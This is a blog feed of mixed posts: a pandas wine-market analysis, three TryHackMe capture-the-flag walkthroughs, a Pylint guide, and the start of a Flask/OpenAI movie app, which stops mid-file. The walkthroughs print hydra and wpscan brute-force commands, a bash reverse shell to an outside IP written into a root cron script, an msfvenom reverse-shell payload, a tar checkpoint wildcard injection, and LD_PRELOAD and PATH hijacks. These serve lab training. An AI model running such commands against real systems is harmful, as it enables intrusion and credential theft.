Posted on Leave a comment

Data Science Tells This Story About the Global Wine Markets 🍷

5/5 – (2 votes)

πŸ“– Background

Many people like to relax or party with a glass of wine. That makes wine an important industry in many countries. Understanding this market is important to the livelihood of many people.

For fun, consider the following fictional scenario:

🍷 Story: You work at a multinational consumer goods organization that is considering entering the wine production industry. Managers at your company would like to understand the market better before making a decision.

πŸ’Ύ The Data

This dataset is a subset of the University of Adelaide’s Annual Database of Global Wine Markets.

The dataset consists of a single CSV file, data/wine.csv.

Each row in the dataset represents the wine market in one country. There are 34 metrics for the wine industry covering both the production and consumption sides of the market.

import pandas as pd wine = pd.read_csv("wine.csv")
print(wine)

πŸ’‘ Info: The pandas.read_csv() is a function in the Pandas library that reads data from a CSV file and creates a DataFrame object. It has various parameters for customization and can handle missing data, date parsing, and different data formats. It’s a useful tool for importing and manipulating CSV data in Python.

πŸ’ͺ Challenge

Explore the dataset to understand the global wine market.

The given analysis should satisfy four criteria: Technical approach (20%), Visualizations (20%), Storytelling (30%), and Insights and recommendations (30%).

The Technical approach will focus on the soundness of the approach and the quality of the code. Visualizations will assess whether the visualizations are appropriate and capable of providing clear insights. The Storytelling component will evaluate whether the data supports the narrative and if the narrative is detailed yet concise. The Insights and recommendations component will check for clarity, relevance to the domain, and recognition of analysis limitations.


🍷 Wine Market Analysis in Four Steps

Step 1: Data Preparation

Import the necessary libraries, and the dataset. Then, if necessary I clean the data and see what features are available for analysis.

import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns wine = pd.read_csv("wine.csv") # Check DataFrame
print(wine.info())

I print some information about the DataFrame to get the column names and non-zero values with df.info() method.

πŸ’‘ Info: The Pandas DataFrame.info() method provides a concise summary of a DataFrame’s content and structure, including data types, column names, memory usage, and the presence of null values. It’s useful for data inspection, optimization, and error-checking.

Check β€žNaN” values:

wine[wine.isna().any(axis=1)]

There is some “NaN” that we have to manage. It is logical that if there is no β€žVine Area” then they cannot produce wine. So where there is 0 area, we change production to 0.

print(wine[['Country', 'Wine produced (ML)']][wine["Vine Area ('000 ha)"]==0])
	      Country    Wine produced (ML)
6         Denmark           NaN
7         Finland           NaN
10        Ireland           NaN
12        Sweden            NaN
42        Hong Kong         NaN
46        Malaysia          NaN
47    Philippines       NaN
48        Singapore         NaN
wine.loc[wine["Vine Area ('000 ha)"] == 0, "Wine produced (ML)"] = 0

πŸ’‘ Info: The DataFrame.loc is a powerful Pandas method used for selecting or modifying data based on labels or boolean conditions. It allows for versatile data manipulations, including filtering, sorting, and value assignment.

You can watch an explainer video on it here:

YouTube Video

Step 2: Gain Data Overview

To find the biggest importers and exporters and to get a more comprehensive picture of the market, I have created some queries.

DataFrame.nlargest(n, columns) is the easiest way to perform the search, where “n” is the number of hits and “columns” is the name of the column being searched. nlargest() returns the values in sorted order.

best_10_importers_by_value = wine.nlargest(10, 'Value of wine imports (US$ mill)')
print(best_10_importers_by_value)
best_10_importers_by_liter = wine.nlargest(10, 'Wine import vol. (ML)')
print(best_10_importers_by_liter)
best_10_exporters_by_value = wine.nlargest(10, 'Value of wine exports (US$ mill)')
print(best_10_exporters_by_value)
best_10_exporters_by_liter = wine.nlargest(10, 'Wine export vol. (ML)')
print(best_10_exporters_by_liter)

Step 3: Create Diagrams

It is time to create diagrams.

Let’s look at imports/exports by country. I have put the import/export columns on the y-axis of a barplot for easy comparison. A barplot displays the relationship between a numeric (export/import) and a categorical (Countries) variable.

πŸ’‘ Info: The pandas.DataFrame.plot() is a method in the Pandas library that generates various visualizations from DataFrame objects. It’s easy to use and allows for customization of plot appearance and behavior. plot() is a useful tool for data exploration, communication, and hypothesis testing.

I used the pandas built-in plot function to create the chart. The plot function here takes the x and y values, the kind of graph, and the title as arguments.

best_10_importers_by_liter.plot(x =    'Country', y = ['Wine import vol. (ML)', 'Wine export vol. (ML)'], kind = 'bar', title = 'Import / Export by Country')

The first insight that I got, is that it’s a bit confusing that France has the largest exports but still takes the 4th (and third) place in imports… The French seem to like foreign wines.

See what countries do not produce enough wine to cover their own consumption! To do this, I subtracted wine production and exports from their own consumption in a new column.

#create new column to calculate wine demand
wine['wine_demand'] = wine['Wine consumed (ML)'] - (wine['Wine produced (ML)'] - wine['Wine export vol. (ML)']) top_10_wine_demand = wine.nlargest(10, 'wine_demand')
print(top_10_wine_demand)

Or, visualized:

Is there enough GDP per capita for consumption?

I think that people who live in countries with high GDP per capita can afford more expensive and more wine.

I have created a seaborn relation plot, where the hue represents GDP and the y-axis represents wine demand.

πŸ’‘ Info: Seaborn is a Python data visualization library that offers a high-level interface for creating informative and attractive statistical graphics. It’s built on top of the Matplotlib library and includes several color palettes and themes, making it easy to create complex visualizations with minimal code. Seaborn is often used for data exploration, visualization in scientific research, and communication of data insights.

I set the plot style to 'darkgrid' for better look. Please note that this setting will remain as long as you do not change it, including the following graphs.

Seaborn’s relplot returns a FacetGrid object which has a set_xticklabels function to customize x labels.

sns.set_style('darkgrid')
chart = sns.relplot(data = top_10_wine_demand, x = 'Country', y = 'wine_demand', hue = "GDP per capita ('000 US$)")
chart.set_xticklabels(rotation = 65, horizontalalignment = 'right')

My main conclusion from this is that if you have a winery in Europe, the best place to sell your wine is in the UK and Germany, and otherwise, in the US.

Step 4: Competitor Analysis

And now, let’s look at the competitors:

Where is the cheapest wine from, and what country exports lot of cheap wine?

Since we have no data on this, I did a little feature engineering to find out which countries export wine at the lowest price per litre. Feature engineering

when we create a feature (a new column) to add useful information from existing data to your dataset.

wine['export_per_liter'] = wine['Value of wine exports (US$ mill)'] / wine['Wine export vol. (ML)'] top_10_cheapest = wine.nsmallest(10, 'export_per_liter')
print(top_10_cheapest)

Plot the findings:

top_10_cheapest.plot(x = 'Country', y = ['Value of wine exports (US$ mill)', 'Wine export vol. (ML)'], kind = 'bar', figsize = (8, 6))
plt.legend(loc = 'upper left', title = 'Cheapest wine exporters')

It is clear that Spain is by far the biggest exporter of cheap wine, followed by South Africa, but in much smaller quantities.

Conclusion

If you want to gain insight into large data sets, visualization is king and you don’t need fancy, complicated graphs to see the relationships behind the data clearly.

Understanding the tools is vital — without DataFrames, we wouldn’t have been able to pull off this analysis quickly and efficiently:

πŸ‘‰ Recommended Tutorial: Pandas in 10 Minutes

Posted on Leave a comment

How I used Enum4linux to Gain a Foothold Into the Target Machine (TryHackMe)

5/5 – (1 vote)

πŸ’‘ Enum4linux is a software utility designed to extract information from both Windows and Samba systems. Its primary objective is to provide comparable functionality to the now-defunct enum.exe tool, which was previously accessible at www.bindview.com. Enum4linux is coded in PERL and essentially functions as an interface for the Samba toolset, including smbclient, rpclient, net, and nmblookup.

CHALLENGE OVERVIEW

  • CTF Creator: John Hammond
  • Link: Basic Pentesting
  • Difficulty: Easy 
  • Target: user flag and final flag
  • Highlight: extracting credentials from an SMB server with SMBmap
  • Tools used: nmap, dirb, enum4linux, john, hydra, linpeas, ssh
  • Tags: security, boot2root, cracking, webapp

BACKGROUND

This is a pretty standard type of CTF challenge that involves some recon, gaining an initial foothold, lateral privilege escalation, and discovery of the flags.

It was a great way to review how to use the standard pentesting tools (i.e., nmap, dirb, smbmap, john, hydra).

If you are just starting with CTF challenges, you may find some of the tools and concepts to be a bit more technical. Please check out the video walkthrough if anything is unclear in this write-up!Β 

ENUMERATION/RECON

IP ADRESSES

export targetIP=10.10.192.10
export myIP=10.6.2.23

ENUMERATION

NMAP SCAN

nmap -A -p- -T4 -oX nmap.txt $targetIP
  • -A Enable OS detection, version detection, script scanning, and traceroute
  • -p- scan all ports
  • -T4 speed 4 (1-5 with 5 being the fastest)
  • -oX output as an XML-type file

DIRB SCAN

dirb http://$targetIP -o dirb.txt
  • -o output as <filename>

WALK THE WEBSITE

Check our dev note section if you need to know what to work on. (I found a hint in sourcecode)

http://10.10.192.10/development/

Reading through these two documents, we learn the following interesting things:

  • User β€œJ” has a weak password hash in /etc/shadow that can be cracked easily!
  • We may be able to find an exploit for REST version 2.5.12Β 

Searching through exploit-db we find two possibilities:

  1. https://www.exploit-db.com/exploits/45068
  2. https://www.exploit-db.com/exploits/42627 (this one is probably it!)

I tried out this python exploit, but didn’t have any luck. Let’s move forward for now and enumerate the SMB server.

ENUMERATING SMBΒ Β Β Β 

smbmap -a $targetIP

We see a listing for an anonymous login in our results. However, we aren’t able to log in as anonymous.

USING ENUM4LINUX TO EXTRACT SSH LOGIN CREDENTIALS

enum4linux -a 10.10.192.10

-aΒ  Do all simple enumeration (-U -S -G -P -r -o -n -i)

found users: kay and jan

My guess is that our first user credential with the easy hash will be for user jan because the hidden file j.txt in the /development folder was written to β€œJ”.

USING HYDRA TO BRUTEFORCE A PASSWORD FOR JAN/KAY

hydra -l jan -t 4 -P /home/kalisurfer/hacking-tools/rockyou.txt ssh://10.10.192.10
hydra -l kay -P /home/kalisurfer/hacking-tools/rockyou.txt ssh://10.10.192.10 discovered password for jan: armando

LOCAL RECON – LOG IN AS JAN VIA SSH

We’ll automate our local recon with linpeas.sh

To get the script on our target system, we spin up a simple python3 HTTP server on our attack box and use wget to copy it to the /tmp directory of our target system.

After running linpeas.sh we review our results and found a hidden ssh key for user kay. Our next step is to prep and crack the hash to discover the hash password needed for logging in as user kay.

LATERAL PRIVILEGE ESCALATION TO USER KAY

First we’ll use ssh2john to prep the hash to use with John the RIpper.Β 

Next, we’ll crack the password for the hash with john. 

Now that we’ve brute-forced the password with hashes of the wordlist rockyou.txt, we can go ahead and switch users to kay with the password beeswax.

POST-EXPLOITATION

Locate pass.bak file

Cat to find β€œfinal password”

FINAL THOUGHTS

This box showed the power of enum4linux for enumerating Linux machines. We were able to extract two usernames that helped us to brute force our way into the server and gain our initial foothold.

Linpeas also can do similar things, but the big difference between the two is that Linpeas is for local enumeration, and enum4linux is for initial enumeration before gaining a foothold.Β 

πŸ‘‰ Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick β€œCapture The Flag” Challenge

Posted on Leave a comment

TryHackMe – How I Used WPScan to Extract Login Credentials (WordPress)

5/5 – (1 vote)

CHALLENGE OVERVIEW

YouTube Video

BACKGROUND

This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address.

We will have to discover ports and services running on the server with our standard pentesting tools like nmap and dirb scan. We also don’t have any inside information about the backend of the target machine.

Let’s get started!

We’ll be testing out the website pentest.ws during today’s video walkthrough.

It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports).

At the end of this post, I will summarize my thoughts on using pentest.ws for the first time.

ENUMERATION/RECON

sudo nmap -A -oX nmap.txt $targetIP -p-

Today we are exporting our nmap results in XML format so that we can upload them to pentest.ws and have the site automatically parse our findings.

dirb http://$targetIP -o dirb.txt

We discovered a WordPress login at: http://internal.thm/blog/wp-login.php

USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS

Let’s use wpscan to discover the admin’s email and password for WordPress.

wpscan --url 10.10.61.252/blog -e vpn,u -o wpscan.txt

Now that we found a username, we can run wpscan again with a wordlist to brute-force the password.

wpscan --url 10.10.61.262/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt

We found the admin email and password!

admin:my2boys

Now we can log into WordPress and look for a place to upload a revshell.

INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP

We’ll edit the template for 404.php and drop in a revshell created quickly and easily with EzpzShell.py.

If you want to learn more about ezpzshell, check out my previous blog post:

πŸ‘‰ Learn More: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation

ezpz 10.6.2.23 8888 php (ezpzshell also automatically starts a listener)

After copying the payload to 404.php, we make sure it is saved and then trigger the payload:

http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php

And if everything is set up correctly, we will catch the revshell with ezpz as user: www-data.

STABILIZE THE SHELL

The following command will stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

INTERNAL ENUMERATION – FIND USER CREDS

We discover a txt file with credentials:

cat wp-save.txt Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123

Let’s try switching users to aubreanna with the password given in wp-save.txt.

su aubreanna

We are in as user aubreanna and immediately find the user flag.

aubreanna@internal:~$ cat us cat user.txt THM{iβ€”------omitted--------1}

MORE ENUMERATION – DISCOVER A JENKINS SERVICE

cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080

SET UP PORT FORWARDING VIA SSH LOGIN

ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252

SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the Jenkins login page in our browser.

BRUTE-FORCE THE LOGIN

hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'

The payload on this command has three parts:

  1. http-post-form + header
  2. the request, edited with admin as the username and ^PASS^ in place of the password to mark it as the variable for the password wordlist
  3. the error message that the website will return with a wrong passwordΒ 

Output:

Using burpsuite or developer mode on firefox will allow us to extract these strings and modify it to our final hydra payload.
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
\
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10

Credentials found! admin:spongebob

ENUMERATING JENKINS AS ADMIN

We’ll use the script console on Jenkins to spawn another revshell using groovy scripting language.

We’ll use ezpzshell and choose the Java code, because groovy is built on Java. This time when we catch it, we will be user jenkins.

Manually enumerating through the file system we stumble across a note.txt. Let’s check out the contents:

cat note.txt

Output:

Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123

Bingo! We found root user credentials! 

SWITCH USERS TO ROOT

su root
root@internal:~# cat root.txt
THM{dβ€”-omittedβ€”3r}

FINAL THOUGHTS

I’m not convinced yet that pentest.ws will save me much time on my note taking. Maybe with time and experience it would help.

I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform.

However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords.

Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.

πŸ‘‰ Recommended: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation

Posted on Leave a comment

TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)

5/5 – (1 vote)

CHALLENGE OVERVIEW

YouTube Video
  • CTF Creator: Tib3rius
  • Link: https://tryhackme.com/room/linuxprivesc
  • Difficulty: medium 
  • Target: gaining root access using a variety of different techniques
  • Highlight: Quickly gaining root access on a Linux computer in many different ways
  • Tags: privesc, linux, privilege escalation

BACKGROUND

Using different exploits to compromise operating systems can feel like magic (when they work!).

In this walkthrough, you will see various β€œmagical” ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.

TASK 1 Deploy the Vulnerable Debian VM

After connecting to our TryHackMe VPN, let’s start our notes.txt file and write down our IPs in an export fashion.

export targetIP=10.10.63.231
export myIP=10.6.2.23

Now we can go ahead and log in via SSH using the starting credentials given in the instructions:

ssh user@10.10.63.231
id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

Now that we are in via SSH, let’s start exploiting this machine!

TASK 2 Service Exploits

In this task, we will privesc by exploiting MySQL using https://www.exploit-db.com/exploits/1518

We’ll create a new file named rootbash that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the privesc.

Task 3: Weak File Permissions – Readable /etc/shadow

In this task, we will read /etc/shadow and crack the hash with John the Ripper.

First, we need to save the root entry from /etc/shadow file as hash.txt.

Next, let’s load up John and crack the hash with rockyou.txt as our wordlist

john --wordlist=</PATH/TO/>rockyou.txt hash.txt

We have found our root password, password123!

TASK 4: Weak File Permissions – Writeable /etc/shadow

In this task, we will change the root password in /etc/shadow file.

mkpasswd -m sha-512 newpasswordhere
$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.
user@debian:~/tools/mysql-udf$ nano /etc/shadow
user@debian:~/tools/mysql-udf$ su root
Password: root@debian:/home/user/tools/mysql-udf#

TASK 5 Weak File Permissions – Writeable /etc/passwd

In this task, we will change the root passwd in /etc/passwd. First we need to generate a new hashed password:Β 

openssl passwd newpasswordhere

TASK 6 Sudo – Shell Escape Sequences

Let’s check our sudo privileges:

sudo -l

We can choose any of the many bin files that we have sudo permissions on, except for the apache2 bin that doesn’t have a sudo exploit listed on GTFObins

Today we’ll choose to run the exploit utilizing the more bin file.

πŸ‘‰ Link: https://gtfobins.github.io/gtfobins/more/

Running the following two commands gives us a root shell:

TERM= sudo more /etc/profile
!/bin/sh

TASK 7 Sudo – Environment Variables

Method 1: preload file spoofing

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so more

Method 2: shared object spoofing

ldd /usr/sbin/apache2
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2

TASK 8 Cron Jobs – File Permissions

In this task, we will root the Linux box by changing the file overwrite.sh that is scheduled to run automatically every minute on cron jobs.

Because we have to write file permissions on the file, we can change the contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.

Overwrite the file with the following:

#!/bin/bash
bash -i >& /dev/tcp/10.6.2.23/8888 0>&1

Now, all we need to do is start a netcat listener and wait for a maximum of 1 minute to catch the revshell.

nc -lnvp 8888

TASK 9 Cron Jobs – PATH Environment Variable

In this task, we will hijack the PATH environment variable by creating an overwrite.sh file in /home/user directory.

user@debian:~$ cat overwrite.sh #!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

This bash script will copy /bin/bash (the shell) to the tmp directory, then add execute privileges and an suid bit. After the overwrite.sh file runs, we can manually activate the root shell by running the new file β€œrootbash” with persistence mode.

user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# exit

TASK 10 Cron Jobs – Wildcards

In this exploit, we will use strange filenames to trick the system into thinking they are checkpoint flags on the tarball command which issue a command to run the elf shell to give us a root shell on our netcat listener.Β 

First, let’s create a new payload for a revshell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf

Next, we’ll transfer the elf file to /home/usr on the target via a simple HTTP server. Finally, we need to create two empty files with the following names:

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

Finally, we’ll need to start up a netcat listener to catch the root shell.

nc -lnvp 8888

POST-EXPLOITATION

Let’s remove the shell and the other two spoofed empty command extension files.

rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf

FINAL THOUGHTS

Magic isn’t actually needed to carry out any of the privesc methods outlined in this post.

As long as the target machine has a misconfiguration on password files (/etc/shadow and/or /etc/passwd), cron jobs are set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.

Thanks for reading this write-up, and be sure to check out part II for more β€œmagical” privesc methods.

Posted on Leave a comment

Stop Writing Messy Code! A Helpful Guide to Pylint

4/5 – (1 vote)

As a Python developer, you know how important it is to write high-quality, error-free code. But let’s face it – sometimes it’s hard to catch every little mistake, especially when working on large projects or collaborating with a team.

That’s where Pylint comes in.

Yes, that’s the original Pylint logo πŸ˜†

Pylint is like a trusty sidekick for your code, helping you spot errors, enforce good coding habits, and keep your code consistent and clean. It’s like having a second set of eyes to catch the little things that you might have missed.

But Pylint isn’t just for the big leagues – it’s a tool that can benefit developers of all levels.

In this article, we’ll dive into Pylint and cover everything you need to know to get started – from installation and configuration, to using Pylint in your favorite code editor, to tackling common errors and warnings that Pylint can help you catch.

So whether you’re a seasoned pro or a Python newbie, let’s dive in and see what Pylint can do for your code!

Installing and Configuring Pylint

Installing Pylint is a straightforward process, and there are several ways to do it.

One of the most popular methods is to use pip, Python’s package manager. To install Pylint using pip, simply open your command prompt or terminal and type:

pip install pylint

If you’re using a different package manager, you can consult their documentation for specific installation instructions.

Once you have Pylint installed, it’s important to configure it to match your project’s needs. Pylint has many configuration options that can be customized to fit your preferences and coding style. For example, you might want to change the maximum line length or enable/disable specific checks based on your project’s requirements.

To configure Pylint, you can create a configuration file in your project’s root directory. The default configuration file name is .pylintrc, but you can also specify a different file name or path if needed. The configuration file is written in INI format, and it contains various sections and options that control Pylint’s behavior.

Here’s an example of a basic .pylintrc file:

[MASTER]
max-line-length = 120 [MESSAGES CONTROL]
disable = missing-docstring, invalid-name

This file sets the maximum line length to 120 characters and disables two specific checks related to missing docstrings and invalid variable names. You can customize the file to match your project’s requirements and coding style.

Keep in mind that Pylint also provides many command-line options that can override or supplement the configuration file settings. You can run pylint --help to see a list of available options.

With these steps, you should be able to install and configure Pylint to help you keep your code in top shape. In the next section, we’ll explore how to use Pylint within popular code editors like VSCode and PyCharm.

Pylint in Code Editors

When it comes to writing code, most developers prefer to use a code editor that can provide real-time feedback and make the coding process easier. Fortunately, Pylint can be integrated with many popular code editors, making it easier to use and providing real-time feedback.

Let’s take a look at how to set up Pylint in two of the most popular code editors, VSCode and PyCharm.

πŸ‘‰ Recommended: Best IDE and Code Editors

Setting up Pylint in VSCode

  1. Open VSCode and install the Python extension if you haven’t already.
  2. Open a Python project in VSCode.
  3. Press Ctrl + Shift + P to open the Command Palette and type “Python: Select Linter”. Choose “Pylint” from the list.
  4. You may be prompted to install Pylint if you haven’t already. If prompted, select “Install”.
  5. You should now see Pylint output in the VSCode “Problems” panel. Pylint will automatically check your code as you type, and will show any errors or warnings in real-time.

Setting up Pylint in PyCharm

  1. Open your Python project in PyCharm.
  2. Go to Preferences > Tools > External Tools.
  3. Click the + button to add a new external tool. Fill in the fields as follows:
    • Name: Pylint
    • Program: pylint
    • Arguments: –output-format=parseable $FileDir$/$FileName$
    • Working directory: $ProjectFileDir$
  4. Click OK to save the new external tool.
  5. Go to Preferences > Editor > Inspections.
  6. Scroll down to the “Python” section and make sure that “Pylint” is checked.
  7. Click OK to save your settings.
  8. You should now see Pylint output in the PyCharm “Inspection Results” panel. Pylint will check your code as you type or run your project, and will show any errors or warnings in real-time.

By using Pylint in your code editor, you can quickly spot and fix issues in your code, making it easier to maintain high code quality. With Pylint checking your code in real-time, you can focus on writing great code without worrying about common mistakes. In the next section, we’ll compare Pylint with another popular Python linter, Flake8.

Pylint vs. Flake8

While Pylint is a powerful tool for analyzing Python code, it’s not the only linter out there. Another popular linter is Flake8, which, like Pylint, can help you identify errors, enforce coding standards, and keep your code consistent.

But what are the differences between these two tools, and which one should you use?

Comparing Pylint and Flake8

Pylint and Flake8 have several similarities, but they also have some key differences. Here are some of the most important differences to consider:

  • Scope: Pylint is a more comprehensive tool that can check for a wide range of issues, including potential bugs, coding style, and design patterns. Flake8, on the other hand, focuses primarily on coding style issues and is more lightweight.
  • Configuration: Pylint has many configuration options that can be customized to fit your coding style and preferences. Flake8, on the other hand, has fewer configuration options but is generally easier to set up and use out of the box.
  • Performance: Pylint can be slower than Flake8, especially on large projects. This is because Pylint analyzes code more thoroughly and performs more complex checks than Flake8.
  • Output: Pylint provides more detailed output than Flake8, including error codes, severity levels, and more. Flake8, on the other hand, provides simpler, more straightforward output.

Which One Should You Use?

πŸ‘‰ Decision Framework: If you’re working on a large project and want a more comprehensive analysis of your code, Pylint might be the better choice. If you’re looking for a simpler, more lightweight tool that focuses on coding style issues, Flake8 might be a better fit.

In many cases, you can use both Pylint and Flake8 together to get the best of both worlds.

For example, you can use Pylint to perform a comprehensive analysis of your code and use Flake8 to focus on coding style issues. You can also use both tools in your code editor to get real-time feedback as you type.

In the next section, we’ll dive into some common errors and warnings that Pylint can help you catch in your code.

Common Pylint Errors and Warnings

As you use Pylint to analyze your Python code, you may encounter various errors and warnings that highlight potential issues or inconsistencies in your code. In this section, we’ll address some of the most common issues that Pylint may raise, and provide guidance on how to fix them and improve your code quality.

“Line too long” error

One of the most common errors that Pylint may raise is the “line too long” error, which occurs when a line of code exceeds the maximum line length specified in your Pylint configuration. By default, this limit is 80 characters, but you can change it to fit your preferences.

To fix this issue, you can break the line into multiple lines using line continuation characters, such as \ or ().

Here’s an example:

# Before
some_very_long_function_name(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10) # After
some_very_long_function_name( arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10
)

“Too many branches” and “too many statements” warnings

Another set of common warnings that Pylint may raise are the “too many branches” and “too many statements” warnings. These warnings are raised when a function or method has too many conditional branches or too many statements, respectively. They’re a sign that your code might be too complex and difficult to maintain.

To address these warnings, you can refactor your code to make it more modular and easier to understand.

For example, you can break down a long function into smaller functions, or use a switch statement instead of multiple if/else statements.

Here’s an example:

# Before
def complex_function(): if condition1: # do something elif condition2: # do something else elif condition3: # do something even different else: # do something completely different # After
def simpler_function(): if condition1: do_something() elif condition2: do_something_else() elif condition3: do_something_different() else: do_something_completely_different() def do_something(): # do something def do_something_else(): # do something else def do_something_different(): # do something even different def do_something_completely_different(): # do something completely different

By breaking down complex code into smaller, more manageable pieces, you can make your code easier to understand and maintain.

By addressing these common errors and warnings that Pylint may raise, you can improve the quality and readability of your code, making it easier to maintain and scale.

In the next section, we’ll wrap up the article and summarize the benefits of using Pylint in your Python projects.

Conclusion

In this article, we’ve explored Pylint, a powerful tool for analyzing Python code and improving code quality.

  • We started by discussing how to install and configure Pylint, highlighting the importance of customizing Pylint to match your project’s needs.
  • We then dove into how to use Pylint in popular code editors like VSCode and PyCharm, providing step-by-step instructions for setup and highlighting the benefits of using Pylint for real-time feedback.
  • Next, we compared Pylint with another popular linter, Flake8, and discussed the strengths and weaknesses of each tool.
  • Finally, we addressed some common errors and warnings that Pylint may raise, providing guidance and code examples on how to fix these issues and improve your code quality.

Pylint is a valuable tool that can help you maintain high code quality and avoid common mistakes. By using Pylint to analyze your code, you can catch errors and warnings before they become bigger issues, making it easier to maintain and scale your projects. With real-time feedback and customizable settings, Pylint is a great asset for developers of all levels and experience.

Whether you’re a seasoned Python developer or just starting out, we hope this article has provided you with valuable insights and practical tips on how to use Pylint effectively.

πŸ‘‰ Recommended: 7 Tips to Clean Code

Posted on Leave a comment

Building a Movie Recommendation App with ChatGPT

5/5 – (1 vote)

In this article, I will show you how I have built a simple but quite powerful movie recommendation app.

πŸ’» Try It Yourself: You can play with the live demo here.

YouTube Video

I built it for two reasons:

  • (i) to keep educating myself on modern technologies,
  • (ii) to see which movies can entertain me on a weekend night.

This app uses Python, HTML/CSS, Flask, Vercel, and the OpenAI API capabilities.

Prerequisites

Files in this project

Here is the snapshot of my code from GitHub.

The key files are these:

  • .env
  • api/index.py
  • api/templates/index.html

First, I use the .env file and add my secret key.

FLASK_APP=app
FLASK_DEBUG=1
OPENAI_API_KEY=sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Then goes the Python file.

import os, openai
from flask import Flask, redirect, render_template, request, url_for app = Flask(__name__)
openai.api_key = os.getenv("OPENAI_API_KEY") @app.route("/", methods=("GET", "POST"))
def index(): if request.method == "POST": category = request.form["category"] number = request.form["number"] response = openai.Completion.create( model="text-davinci-003", prompt=generate_prompt(number, category), temperature=0.5, max_tokens=60, top_p=1, frequency_penalty=0, presence_penalty=0 ) return redirect(url_for("index", result=response.choices[0].text)) result = request.args.get("result") return render_template("index.html", result=result) def generate_prompt(number, category): return """Recommend the best {} {} movies to watch:""".format(number, category.capitalize() ) if __name__ == '__main__': app.run(host='127.0.0.1', port=5050, debug=True)

The imports I use are the following:

  • os – to work with the functionality dependent on the operating system
  • openai – to get the best of OpenAI artificial intelligence
  • flask – to have a nice-looking frontend framework for Python

Some Flask basics. 

@app.route("/", methods=("GET", "POST"))

The first line there is implementing the main route (and the only one in this app). You can think of it as the main URL, whether it is localhost/ or www.mysite.com/.

The following function index() is taking information from the HTML form (see index.html) and preparing the data to be displayed back by the index.html site.

Here’s what happens the moment you hit the β€œGenerate titles” button on your site:

  • index() function takes the input being β€œnumber” and β€œcategory” from the form,
  • feeds it into the generate_prompt() function, 
  • which crafts and passes back a question to be asked,
  • which then – via the API – is sent to OpenAI to get a β€œresponse”, 
  • that is then passed as β€œresult” onto index.html to render on the screen.

Let’s also have a look at the index.html file.

<!DOCTYPE html>
<head> <title>OpenAI Movies</title> <link rel="shortcut icon" href="{{ url_for('static', filename='movie.png') }}" /> <link rel="stylesheet" href="{{ url_for('static', filename='main.css') }}" />
